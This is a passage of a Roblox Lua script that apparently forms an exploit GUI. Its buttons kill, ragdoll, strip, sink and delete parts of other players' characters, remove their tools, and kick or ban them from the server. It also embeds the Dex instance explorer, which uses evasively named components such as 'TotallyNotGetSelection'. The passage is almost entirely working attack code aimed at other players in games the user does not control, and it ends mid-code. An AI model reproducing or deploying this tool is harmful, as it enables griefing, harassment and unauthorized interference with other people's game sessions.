top.Parent = main top.Active = true top.BackgroundColor3 = Color3.fromRGB(47, 47, 47) top.BackgroundTransparency = 0.300 top.BorderColor3 = Color3.fromRGB(29, 29, 29) top.Draggable = true top.Position = UDim2.new(0.612145662, 102, 0.311965823, -29) top.Size = UDim2.new(0, 291, 0, 30) back.Name = "back" back.Parent = top back.BackgroundColor3 = Color3.fromRGB(47, 47, 47) back.BackgroundTransparency = 0.300 back.BorderColor3 = Color3.fromRGB(29, 29, 29) back.BorderSizePixel = 0 back.Position = UDim2.new(-0.00343642617, 0, 1, 0) back.Size = UDim2.new(0, 293, 0, 293) ScrollingFrame.Parent = back ScrollingFrame.Active = true ScrollingFrame.BackgroundColor3 = Color3.fromRGB(255, 255, 255) ScrollingFrame.BackgroundTransparency = 1.000 ScrollingFrame.BorderSizePixel = 0 ScrollingFrame.LayoutOrder = 999999999 ScrollingFrame.Position = UDim2.new(0.0341299027, 0, 0.0784982964, 0) ScrollingFrame.Size = UDim2.new(0, 282, 0, 208) ScrollingFrame.CanvasSize = UDim2.new(0, 0, 0, 825) bald.Name = "bald" bald.Parent = ScrollingFrame bald.BackgroundColor3 = Color3.fromRGB(172, 172, 172) bald.BackgroundTransparency = 0.500 bald.BorderSizePixel = 0 bald.Size = UDim2.new(0, 131, 0, 40) bald.Font = Enum.Font.SourceSansLight bald.Text = "Bald" bald.TextColor3 = Color3.fromRGB(255, 255, 255) bald.TextSize = 23.000 bald.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("Accessory") then Destroy(v) end end end end) ragdoll.Name = "ragdoll" ragdoll.Parent = ScrollingFrame ragdoll.BackgroundColor3 = Color3.fromRGB(172, 172, 172) ragdoll.BackgroundTransparency = 0.500 ragdoll.BorderSizePixel = 0 ragdoll.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) ragdoll.Size = UDim2.new(0, 131, 0, 40) ragdoll.Font = Enum.Font.SourceSansLight ragdoll.Text = "Ragdoll" ragdoll.TextColor3 = Color3.fromRGB(255, 255, 255) ragdoll.TextSize = 23.000 ragdoll.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Humanoid")) end end) kill.Name = "kill" kill.Parent = ScrollingFrame kill.BackgroundColor3 = Color3.fromRGB(172, 172, 172) kill.BackgroundTransparency = 0.500 kill.BorderSizePixel = 0 kill.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) kill.Size = UDim2.new(0, 131, 0, 40) kill.Font = Enum.Font.SourceSansLight kill.Text = "Kill" kill.TextColor3 = Color3.fromRGB(255, 255, 255) kill.TextSize = 23.000 kill.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character:FindFirstChildOfClass("Humanoid").RigType == Enum.HumanoidRigType.R6 then Destroy(Players[v].Character.Torso.Neck) else Destroy(Players[v].Character.Head.Neck) end end end) naked.Name = "naked" naked.Parent = ScrollingFrame naked.BackgroundColor3 = Color3.fromRGB(172, 172, 172) naked.BackgroundTransparency = 0.500 naked.BorderSizePixel = 0 naked.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) naked.Size = UDim2.new(0, 131, 0, 40) naked.Font = Enum.Font.SourceSansLight naked.Text = "Naked" naked.TextColor3 = Color3.fromRGB(255, 255, 255) naked.TextSize = 23.000 naked.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) Destroy(Players[v].Character:FindFirstChildOfClass("ShirtGraphic")) end end) goto.Name = "goto" goto.Parent = ScrollingFrame goto.BackgroundColor3 = Color3.fromRGB(172, 172, 172) goto.BackgroundTransparency = 0.500 goto.BorderSizePixel = 0 goto.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) goto.Size = UDim2.new(0, 131, 0, 40) goto.Font = Enum.Font.SourceSansLight goto.Text = "Goto" goto.TextColor3 = Color3.fromRGB(255, 255, 255) goto.TextSize = 23.000 goto.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do if Players[v].Character ~= nil then if Players.LocalPlayer.Character:FindFirstChildOfClass('Humanoid') and Players.LocalPlayer.Character:FindFirstChildOfClass('Humanoid').SeatPart then Players.LocalPlayer.Character:FindFirstChildOfClass('Humanoid').Sit = false wait(.1) end getRoot(Players.LocalPlayer.Character).CFrame = getRoot(Players[v].Character).CFrame + Vector3.new(3,1,0) end end end) rtools.Name = "rtools" rtools.Parent = ScrollingFrame rtools.BackgroundColor3 = Color3.fromRGB(172, 172, 172) rtools.BackgroundTransparency = 0.500 rtools.BorderSizePixel = 0 rtools.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) rtools.Size = UDim2.new(0, 131, 0, 40) rtools.Font = Enum.Font.SourceSansLight rtools.Text = "Rtools" rtools.TextColor3 = Color3.fromRGB(255, 255, 255) rtools.TextSize = 23.000 rtools.MouseButton1Click:connect(function() local players = getPlayer(target.Text) for i, v in pairs(players) do for i, v in pairs(Players[v]:FindFirstChildOfClass("Backpack"):GetChildren()) do Destroy(v) end end end) box.Name = "box" box.Parent = ScrollingFrame box.BackgroundColor3 = Color3.fromRGB(172, 172, 172) box.BackgroundTransparency = 0.500 box.BorderSizePixel = 0 box.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) box.Size = UDim2.new(0, 131, 0, 40) box.Font = Enum.Font.SourceSansLight box.Text = "Box" box.TextColor3 = Color3.fromRGB(255, 255, 255) box.TextSize = 23.000 box.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("Accessory") then Destroy(v) end end for i, v in pairs(Players[v].Character:GetChildren()) do if v:IsA("CharacterMesh") then Destroy(v) end end Destroy(Players[v].Character:FindFirstChildOfClass("Pants")) Destroy(Players[v].Character:FindFirstChildOfClass("Shirt")) Destroy(Players[v].Character:FindFirstChildOfClass("ShirtGraphic")) Destroy(Players[v].Character["Left Arm"]) Destroy(Players[v].Character["Left Leg"]) Destroy(Players[v].Character["Right Arm"]) Destroy(Players[v].Character["Right Leg"]) Destroy(Players[v].Character.Head:FindFirstChildOfClass("SpecialMesh")) Destroy(Players[v].Character.Head:FindFirstChildOfClass("Decal")) end end) sink.Name = "sink" sink.Parent = ScrollingFrame sink.BackgroundColor3 = Color3.fromRGB(172, 172, 172) sink.BackgroundTransparency = 0.500 sink.BorderSizePixel = 0 sink.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) sink.Size = UDim2.new(0, 131, 0, 40) sink.Font = Enum.Font.SourceSansLight sink.Text = "Sink" sink.TextColor3 = Color3.fromRGB(255, 255, 255) sink.TextSize = 23.000 sink.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do Destroy(Players[v].Character.HumanoidRootPart) end end) function FindInTable(tbl,val) if tbl == nil then return false end for _,v in pairs(tbl) do if v == val then return true end end return false end local slockk = false local banned = {} Players.PlayerAdded:connect(function(plr) if slockk then Destroy(plr) end if FindInTable(banned, plr.UserId) then Destroy(plr) end end) ban.Name = "ban" ban.Parent = ScrollingFrame ban.BackgroundColor3 = Color3.fromRGB(172, 172, 172) ban.BackgroundTransparency = 0.500 ban.BorderSizePixel = 0 ban.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) ban.Size = UDim2.new(0, 131, 0, 40) ban.Font = Enum.Font.SourceSansLight ban.Text = "Ban" ban.TextColor3 = Color3.fromRGB(255, 255, 255) ban.TextSize = 23.000 ban.MouseButton1Click:connect(function() local players = getPlayer(target.Text, Players.LocalPlayer) for i, v in pairs(players) do table.insert(banned, Players[v].UserId) Destroy(Players[v]) end end) explorer.Name = "explorer" explorer.Parent = ScrollingFrame explorer.BackgroundColor3 = Color3.fromRGB(172, 172, 172) explorer.BackgroundTransparency = 0.500 explorer.BorderSizePixel = 0 explorer.Position = UDim2.new(0.079136692, 0, -0.00990098994, 0) explorer.Size = UDim2.new(0, 131, 0, 40) explorer.Font = Enum.Font.SourceSansLight explorer.Text = "Explorer" explorer.TextColor3 = Color3.fromRGB(255, 255, 255) explorer.TextSize = 23.000 explorer.MouseButton1Click:connect(function() CreateGui = function() local NewGuiPart1 = Instance.new("ScreenGui") local NewGuiPart2 = Instance.new("Frame") local NewGuiPart3 = Instance.new("Frame") local NewGuiPart4 = Instance.new("TextLabel") local NewGuiPart5 = Instance.new("TextBox") local NewGuiPart6 = Instance.new("Frame") local NewGuiPart7 = Instance.new("Frame") local NewGuiPart8 = Instance.new("TextButton") local NewGuiPart9 = Instance.new("TextLabel") local NewGuiPart10 = Instance.new("TextLabel") local NewGuiPart11 = Instance.new("ImageLabel") local NewGuiPart12 = Instance.new("Frame") local NewGuiPart13 = Instance.new("Frame") local NewGuiPart14 = Instance.new("Frame") local NewGuiPart15 = Instance.new("TextButton") local NewGuiPart16 = Instance.new("ImageLabel") local NewGuiPart17 = Instance.new("TextButton") local NewGuiPart18 = Instance.new("ImageLabel") local NewGuiPart19 = Instance.new("TextButton") local NewGuiPart20 = Instance.new("ImageLabel") local NewGuiPart21 = Instance.new("TextButton") local NewGuiPart22 = Instance.new("ImageLabel") local NewGuiPart23 = Instance.new("TextButton") local NewGuiPart24 = Instance.new("ImageLabel") local NewGuiPart25 = Instance.new("TextButton") local NewGuiPart26 = Instance.new("ImageLabel") local NewGuiPart27 = Instance.new("TextButton") local NewGuiPart28 = Instance.new("Frame") local NewGuiPart29 = Instance.new("Frame") local NewGuiPart30 = Instance.new("TextLabel") local NewGuiPart31 = Instance.new("Frame") local NewGuiPart32 = Instance.new("TextLabel") local NewGuiPart33 = Instance.new("TextLabel") local NewGuiPart34 = Instance.new("TextButton") local NewGuiPart35 = Instance.new("TextLabel") local NewGuiPart36 = Instance.new("TextLabel") local NewGuiPart37 = Instance.new("Frame") local NewGuiPart38 = Instance.new("Frame") local NewGuiPart39 = Instance.new("TextLabel") local NewGuiPart40 = Instance.new("Frame") local NewGuiPart41 = Instance.new("TextButton") local NewGuiPart42 = Instance.new("TextLabel") local NewGuiPart43 = Instance.new("TextButton") local NewGuiPart44 = Instance.new("TextBox") local NewGuiPart45 = Instance.new("TextButton") local NewGuiPart46 = Instance.new("TextLabel") local NewGuiPart47 = Instance.new("TextLabel") local NewGuiPart48 = Instance.new("Frame") local NewGuiPart49 = Instance.new("TextLabel") local NewGuiPart50 = Instance.new("Frame") local NewGuiPart51 = Instance.new("TextButton") local NewGuiPart52 = Instance.new("TextLabel") local NewGuiPart53 = Instance.new("TextButton") local NewGuiPart54 = Instance.new("Frame") local NewGuiPart55 = Instance.new("TextLabel") local NewGuiPart56 = Instance.new("Frame") local NewGuiPart57 = Instance.new("TextLabel") local NewGuiPart58 = Instance.new("TextButton") local NewGuiPart59 = Instance.new("Frame") local NewGuiPart60 = Instance.new("TextLabel") local NewGuiPart61 = Instance.new("Frame") local NewGuiPart62 = Instance.new("TextLabel") local NewGuiPart63 = Instance.new("ScrollingFrame") local NewGuiPart64 = Instance.new("TextButton") local NewGuiPart65 = Instance.new("TextLabel") local NewGuiPart66 = Instance.new("TextLabel") local NewGuiPart67 = Instance.new("TextButton") local NewGuiPart68 = Instance.new("TextButton") local NewGuiPart69 = Instance.new("Frame") local NewGuiPart70 = Instance.new("TextButton") local NewGuiPart71 = Instance.new("TextBox") local NewGuiPart72 = Instance.new("TextButton") local NewGuiPart73 = Instance.new("TextButton") local NewGuiPart74 = Instance.new("Frame") local NewGuiPart75 = Instance.new("Frame") local NewGuiPart76 = Instance.new("TextButton") local NewGuiPart77 = Instance.new("ScrollingFrame") local NewGuiPart78 = Instance.new("Frame") local NewGuiPart79 = Instance.new("TextLabel") local NewGuiPart80 = Instance.new("TextLabel") local NewGuiPart81 = Instance.new("TextLabel") local NewGuiPart82 = Instance.new("Frame") local NewGuiPart83 = Instance.new("TextLabel") local NewGuiPart84 = Instance.new("Frame") local NewGuiPart85 = Instance.new("Frame") local NewGuiPart86 = Instance.new("Frame") local NewGuiPart87 = Instance.new("ImageButton") local NewGuiPart88 = Instance.new("Frame") local NewGuiPart89 = Instance.new("Frame") local NewGuiPart90 = Instance.new("Frame") local NewGuiPart91 = Instance.new("Frame") local NewGuiPart92 = Instance.new("Frame") local NewGuiPart93 = Instance.new("ImageButton") local NewGuiPart94 = Instance.new("Frame") local NewGuiPart95 = Instance.new("Frame") local NewGuiPart96 = Instance.new("Frame") local NewGuiPart97 = Instance.new("Frame") local NewGuiPart98 = Instance.new("Frame") local NewGuiPart99 = Instance.new("TextButton") local NewGuiPart100 = Instance.new("Frame") local NewGuiPart101 = Instance.new("Frame") local NewGuiPart102 = Instance.new("TextButton") local NewGuiPart103 = Instance.new("TextButton") local NewGuiPart104 = Instance.new("TextButton") local NewGuiPart105 = Instance.new("Frame") local NewGuiPart106 = Instance.new("Frame") local NewGuiPart107 = Instance.new("TextLabel") local NewGuiPart108 = Instance.new("TextLabel") local NewGuiPart109 = Instance.new("TextLabel") local NewGuiPart110 = Instance.new("ImageLabel") local NewGuiPart111 = Instance.new("Frame") local NewGuiPart112 = Instance.new("Frame") local NewGuiPart113 = Instance.new("TextLabel") local NewGuiPart114 = Instance.new("Frame") local NewGuiPart115 = Instance.new("Frame") local NewGuiPart116 = Instance.new("TextLabel") local NewGuiPart117 = Instance.new("TextLabel") local NewGuiPart118 = Instance.new("TextButton") local NewGuiPart119 = Instance.new("TextLabel") local NewGuiPart120 = Instance.new("TextLabel") local NewGuiPart121 = Instance.new("Frame") local NewGuiPart122 = Instance.new("TextLabel") local NewGuiPart123 = Instance.new("TextLabel") local NewGuiPart124 = Instance.new("TextButton") local NewGuiPart125 = Instance.new("TextLabel") local NewGuiPart126 = Instance.new("TextLabel") local NewGuiPart127 = Instance.new("Frame") local NewGuiPart128 = Instance.new("TextLabel") local NewGuiPart129 = Instance.new("TextLabel") local NewGuiPart130 = Instance.new("TextButton") local NewGuiPart131 = Instance.new("TextLabel") local NewGuiPart132 = Instance.new("TextLabel") local NewGuiPart133 = Instance.new("Frame") local NewGuiPart134 = Instance.new("TextLabel") local NewGuiPart135 = Instance.new("TextLabel") local NewGuiPart136 = Instance.new("TextButton") local NewGuiPart137 = Instance.new("TextLabel") local NewGuiPart138 = Instance.new("TextLabel") local NewGuiPart139 = Instance.new("TextLabel") local NewGuiPart140 = Instance.new("Frame") local NewGuiPart141 = Instance.new("Frame") local NewGuiPart142 = Instance.new("TextLabel") local NewGuiPart143 = Instance.new("TextButton") local NewGuiPart144 = Instance.new("TextBox") local NewGuiPart145 = Instance.new("Frame") local NewGuiPart146 = Instance.new("TextButton") local NewGuiPart147 = Instance.new("TextLabel") local NewGuiPart148 = Instance.new("TextLabel") local NewGuiPart149 = Instance.new("Frame") local NewGuiPart150 = Instance.new("Frame") local NewGuiPart151 = Instance.new("TextLabel") local NewGuiPart152 = Instance.new("TextLabel") local NewGuiPart153 = Instance.new("BindableFunction") local NewGuiPart154 = Instance.new("BindableFunction") local NewGuiPart155 = Instance.new("BindableFunction") local NewGuiPart156 = Instance.new("BindableFunction") local NewGuiPart157 = Instance.new("BindableEvent") local NewGuiPart158 = Instance.new("BindableFunction") local NewGuiPart159 = Instance.new("BindableFunction") local NewGuiPart160 = Instance.new("BindableEvent") local NewGuiPart161 = Instance.new("BindableFunction") local NewGuiPart162 = Instance.new("BindableFunction") local NewGuiPart163 = Instance.new("BindableEvent") -- Properties NewGuiPart1.Name = "Dex" NewGuiPart2.Name = "PropertiesFrame" NewGuiPart2.Parent = NewGuiPart1 NewGuiPart2.Active = true NewGuiPart2.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart2.BackgroundTransparency = 0.10000000149012 NewGuiPart2.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart2.Position = UDim2.new(1, 0, 0.5, 36) NewGuiPart2.Size = UDim2.new(0, 300, 0.5, -36) NewGuiPart158.Name = "GetApi" NewGuiPart158.Parent = NewGuiPart2 NewGuiPart158.Archivable = true NewGuiPart159.Name = "GetAwaiting" NewGuiPart159.Parent = NewGuiPart2 NewGuiPart159.Archivable = true NewGuiPart160.Name = "SetAwaiting" NewGuiPart160.Parent = NewGuiPart2 NewGuiPart160.Archivable = true NewGuiPart3.Name = "Header" NewGuiPart3.Parent = NewGuiPart2 NewGuiPart3.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart3.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart3.Position = UDim2.new(0, 0, 0, -36) NewGuiPart3.Size = UDim2.new(1, 0, 0, 35) NewGuiPart4.Parent = NewGuiPart3 NewGuiPart4.BackgroundTransparency = 1 NewGuiPart4.Position = UDim2.new(0, 4, 0, 0) NewGuiPart4.Size = UDim2.new(1, -4, 0.5, 0) NewGuiPart4.Font = Enum.Font.SourceSans NewGuiPart4.FontSize = Enum.FontSize.Size14 NewGuiPart4.Text = "Properties" NewGuiPart4.TextColor3 = Color3.new(0, 0, 0) NewGuiPart4.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart5.Parent = NewGuiPart3 NewGuiPart5.BackgroundTransparency = 0.80000001192093 NewGuiPart5.Position = UDim2.new(0, 4, 0.5, 0) NewGuiPart5.Size = UDim2.new(1, -8, 0.5, -3) NewGuiPart5.Font = Enum.Font.SourceSans NewGuiPart5.FontSize = Enum.FontSize.Size14 NewGuiPart5.Text = "Search Properties" --NewGuiPart5.TextColor3 = Color3.new(0, 0, 0) NewGuiPart5.TextXAlignment = Enum.TextXAlignment.Left NewGuiPart6.Name = "ExplorerPanel" NewGuiPart6.Parent = NewGuiPart1 NewGuiPart6.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart6.BackgroundTransparency = 0.10000000149012 NewGuiPart6.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart6.Position = UDim2.new(1, 0, 0, 0) NewGuiPart6.Size = UDim2.new(0, 300, 0.5, 0) NewGuiPart153.Name = "GetOption" NewGuiPart153.Parent = NewGuiPart6 NewGuiPart153.Archivable = true NewGuiPart154.Name = "TotallyNotGetSelection" NewGuiPart154.Parent = NewGuiPart6 NewGuiPart154.Archivable = true NewGuiPart155.Name = "SetOption" NewGuiPart155.Parent = NewGuiPart6 NewGuiPart155.Archivable = true NewGuiPart156.Name = "TotallyNotSetSelection" NewGuiPart156.Parent = NewGuiPart6 NewGuiPart156.Archivable = true NewGuiPart157.Name = "TotallyNotSelectionChanged" NewGuiPart157.Parent = NewGuiPart6 NewGuiPart157.Archivable = true NewGuiPart7.Name = "SideMenu" NewGuiPart7.Parent = NewGuiPart1 NewGuiPart7.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart7.BackgroundTransparency = 1 NewGuiPart7.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart7.BorderSizePixel = 0 NewGuiPart7.Position = UDim2.new(1, -330, 0, 0) NewGuiPart7.Size = UDim2.new(0, 30, 0, 180) NewGuiPart7.Visible = false NewGuiPart7.ZIndex = 2 NewGuiPart8.Name = "Toggle" NewGuiPart8.Parent = NewGuiPart7 NewGuiPart8.Active = false NewGuiPart8.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart8.BorderSizePixel = 0 NewGuiPart8.Position = UDim2.new(0, 0, 0, 60) NewGuiPart8.Size = UDim2.new(0, 30, 0, 30) NewGuiPart8.AutoButtonColor = false NewGuiPart8.Font = Enum.Font.SourceSans NewGuiPart8.FontSize = Enum.FontSize.Size24 NewGuiPart8.Text = ">" NewGuiPart8.TextTransparency = 1 NewGuiPart8.TextWrapped = true NewGuiPart9.Name = "Title" NewGuiPart9.Parent = NewGuiPart7 NewGuiPart9.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart9.BackgroundTransparency = 1 NewGuiPart9.Size = UDim2.new(0, 30, 0, 20) NewGuiPart9.ZIndex = 2 NewGuiPart9.Font = Enum.Font.SourceSansBold NewGuiPart9.FontSize = Enum.FontSize.Size14 NewGuiPart9.Text = "DEX" NewGuiPart9.TextWrapped = true NewGuiPart10.Name = "Version" NewGuiPart10.Parent = NewGuiPart7 NewGuiPart10.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart10.BackgroundTransparency = 1 NewGuiPart10.Position = UDim2.new(0, 0, 0, 15) NewGuiPart10.Size = UDim2.new(0, 30, 0, 20) NewGuiPart10.ZIndex = 2 NewGuiPart10.Font = Enum.Font.SourceSansBold NewGuiPart10.FontSize = Enum.FontSize.Size12 NewGuiPart10.Text = "V2.0.0" NewGuiPart10.TextWrapped = true NewGuiPart11.Name = "Slant" NewGuiPart11.Parent = NewGuiPart7 NewGuiPart11.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart11.BackgroundTransparency = 1 NewGuiPart11.Position = UDim2.new(0, 0, 0, 90) NewGuiPart11.Rotation = 180 NewGuiPart11.Size = UDim2.new(0, 30, 0, 30) NewGuiPart11.Image = "rbxassetid://474172996" NewGuiPart11.ImageColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart12.Name = "Main" NewGuiPart12.Parent = NewGuiPart7 NewGuiPart12.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart12.BorderSizePixel = 0 NewGuiPart12.Size = UDim2.new(0, 30, 0, 30) NewGuiPart13.Name = "SlideOut" NewGuiPart13.Parent = NewGuiPart7 NewGuiPart13.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart13.BackgroundTransparency = 1 NewGuiPart13.BorderSizePixel = 0 NewGuiPart13.ClipsDescendants = true NewGuiPart13.Position = UDim2.new(0, 0, 0, 30) NewGuiPart13.Size = UDim2.new(0, 30, 0, 150) NewGuiPart14.Name = "SlideFrame" NewGuiPart14.Parent = NewGuiPart13 NewGuiPart14.BackgroundColor3 = Color3.new(0.862745, 0.862745, 0.862745) NewGuiPart14.BorderSizePixel = 0 NewGuiPart14.Position = UDim2.new(0, 0, 0, -150) NewGuiPart14.Size = UDim2.new(0, 30, 0, 150) NewGuiPart15.Name = "Explorer" NewGuiPart15.Parent = NewGuiPart14 NewGuiPart15.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart15.BackgroundTransparency = 1 NewGuiPart15.BorderSizePixel = 0 NewGuiPart15.Position = UDim2.new(0, 0, 0, 120) NewGuiPart15.Size = UDim2.new(0, 30, 0, 30) NewGuiPart15.ZIndex = 2 NewGuiPart15.AutoButtonColor = false NewGuiPart15.Font = Enum.Font.SourceSans NewGuiPart15.FontSize = Enum.FontSize.Size24 NewGuiPart15.Text = "" NewGuiPart16.Name = "Icon" NewGuiPart16.Parent = NewGuiPart15 NewGuiPart16.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart16.BackgroundTransparency = 1 NewGuiPart16.Position = UDim2.new(0, 5, 0, 5) NewGuiPart16.Size = UDim2.new(0, 20, 0, 20) NewGuiPart16.ZIndex = 2 NewGuiPart16.Image = "rbxassetid://472635937" NewGuiPart16.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart17.Name = "SaveMap" NewGuiPart17.Parent = NewGuiPart14 NewGuiPart17.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart17.BackgroundTransparency = 1 NewGuiPart17.BorderSizePixel = 0 NewGuiPart17.Position = UDim2.new(0, 0, 0, 90) NewGuiPart17.Size = UDim2.new(0, 30, 0, 30) NewGuiPart17.ZIndex = 2 NewGuiPart17.AutoButtonColor = false NewGuiPart17.Font = Enum.Font.SourceSans NewGuiPart17.FontSize = Enum.FontSize.Size24 NewGuiPart17.Text = "" NewGuiPart18.Name = "Icon" NewGuiPart18.Parent = NewGuiPart17 NewGuiPart18.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart18.BackgroundTransparency = 1 NewGuiPart18.Position = UDim2.new(0, 5, 0, 5) NewGuiPart18.Size = UDim2.new(0, 20, 0, 20) NewGuiPart18.ZIndex = 2 NewGuiPart18.Image = "rbxassetid://472636337" NewGuiPart18.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart19.Name = "Settings" NewGuiPart19.Parent = NewGuiPart14 NewGuiPart19.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart19.BackgroundTransparency = 1 NewGuiPart19.BorderSizePixel = 0 NewGuiPart19.Position = UDim2.new(0, 0, 0, 30) NewGuiPart19.Size = UDim2.new(0, 30, 0, 30) NewGuiPart19.ZIndex = 2 NewGuiPart19.AutoButtonColor = false NewGuiPart19.Font = Enum.Font.SourceSans NewGuiPart19.FontSize = Enum.FontSize.Size24 NewGuiPart19.Text = "" NewGuiPart20.Name = "Icon" NewGuiPart20.Parent = NewGuiPart19 NewGuiPart20.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart20.BackgroundTransparency = 1 NewGuiPart20.Position = UDim2.new(0, 5, 0, 5) NewGuiPart20.Size = UDim2.new(0, 20, 0, 20) NewGuiPart20.ZIndex = 2 NewGuiPart20.Image = "rbxassetid://472635774" NewGuiPart20.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart21.Name = "Remotes" NewGuiPart21.Parent = NewGuiPart14 NewGuiPart21.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart21.BackgroundTransparency = 1 NewGuiPart21.BorderSizePixel = 0 NewGuiPart21.Position = UDim2.new(0, 0, 0, 60) NewGuiPart21.Size = UDim2.new(0, 30, 0, 30) NewGuiPart21.ZIndex = 2 NewGuiPart21.AutoButtonColor = false NewGuiPart21.Font = Enum.Font.SourceSans NewGuiPart21.FontSize = Enum.FontSize.Size24 NewGuiPart21.Text = "" NewGuiPart22.Name = "Icon" NewGuiPart22.Parent = NewGuiPart21 NewGuiPart22.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart22.BackgroundTransparency = 1 NewGuiPart22.Position = UDim2.new(0, 5, 0, 5) NewGuiPart22.Size = UDim2.new(0, 20, 0, 20) NewGuiPart22.ZIndex = 2 NewGuiPart22.Image = "rbxassetid://472636187" NewGuiPart22.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart23.Name = "About" NewGuiPart23.Parent = NewGuiPart14 NewGuiPart23.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart23.BackgroundTransparency = 1 NewGuiPart23.BorderSizePixel = 0 NewGuiPart23.Size = UDim2.new(0, 30, 0, 30) NewGuiPart23.ZIndex = 2 NewGuiPart23.AutoButtonColor = false NewGuiPart23.Font = Enum.Font.SourceSans NewGuiPart23.FontSize = Enum.FontSize.Size24 NewGuiPart23.Text = "" NewGuiPart24.Name = "Icon" NewGuiPart24.Parent = NewGuiPart23 NewGuiPart24.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart24.BackgroundTransparency = 1 NewGuiPart24.Position = UDim2.new(0, 5, 0, 5) NewGuiPart24.Size = UDim2.new(0, 20, 0, 20) NewGuiPart24.ZIndex = 2 NewGuiPart24.Image = "rbxassetid://476354004" NewGuiPart24.ImageColor3 = Color3.new(0.27451, 0.27451, 0.27451) NewGuiPart25.Name = "OpenScriptEditor" NewGuiPart25.Parent = NewGuiPart7 NewGuiPart25.Active = false NewGuiPart25.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart25.BorderSizePixel = 0 NewGuiPart25.Position = UDim2.new(0, 0, 0, 30) NewGuiPart25.Size = UDim2.new(0, 30, 0, 30) NewGuiPart25.ZIndex = 2 NewGuiPart25.AutoButtonColor = false NewGuiPart25.Font = Enum.Font.SourceSans NewGuiPart25.FontSize = Enum.FontSize.Size24 NewGuiPart25.Text = "" NewGuiPart26.Name = "Icon" NewGuiPart26.Parent = NewGuiPart25 NewGuiPart26.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart26.BackgroundTransparency = 1 NewGuiPart26.Position = UDim2.new(0, 5, 0, 5) NewGuiPart26.Size = UDim2.new(0, 20, 0, 20) NewGuiPart26.ZIndex = 2 NewGuiPart26.Image = "rbxassetid://475456048" NewGuiPart26.ImageColor3 = Color3.new(0.105882, 0.164706, 0.207843) NewGuiPart26.ImageTransparency = 1 NewGuiPart27.Name = "Toggle" NewGuiPart27.Parent = NewGuiPart1 NewGuiPart27.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart27.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) NewGuiPart27.Position = UDim2.new(1, 0, 0, 0) NewGuiPart27.Size = UDim2.new(0, 30, 0, 30) NewGuiPart27.Font = Enum.Font.SourceSans NewGuiPart27.FontSize = Enum.FontSize.Size24 NewGuiPart27.Text = "<" NewGuiPart28.Name = "SettingsPanel" NewGuiPart28.Parent = NewGuiPart1 NewGuiPart28.BackgroundColor3 = Color3.new(1, 1, 1) NewGuiPart28.BackgroundTransparency = 0.10000000149012 NewGuiPart28.BorderColor3 = Color3.new(0.74902, 0.74902, 0.74902) NewGuiPart28.Position = UDim2.new(1, 0, 0, 0) NewGuiPart28.Size = UDim2.new(0, 300, 1, 0) NewGuiPart162.Name = "GetSetting" NewGuiPart162.Parent = NewGuiPart28 NewGuiPart162.Archivable = true NewGuiPart29.Name = "Header" NewGuiPart29.Parent = NewGuiPart28 NewGuiPart29.BackgroundColor3 = Color3.new(0.913726, 0.913726, 0.913726) NewGuiPart29.BorderColor3 = Color3.new(0.584314, 0.584314, 0.584314) 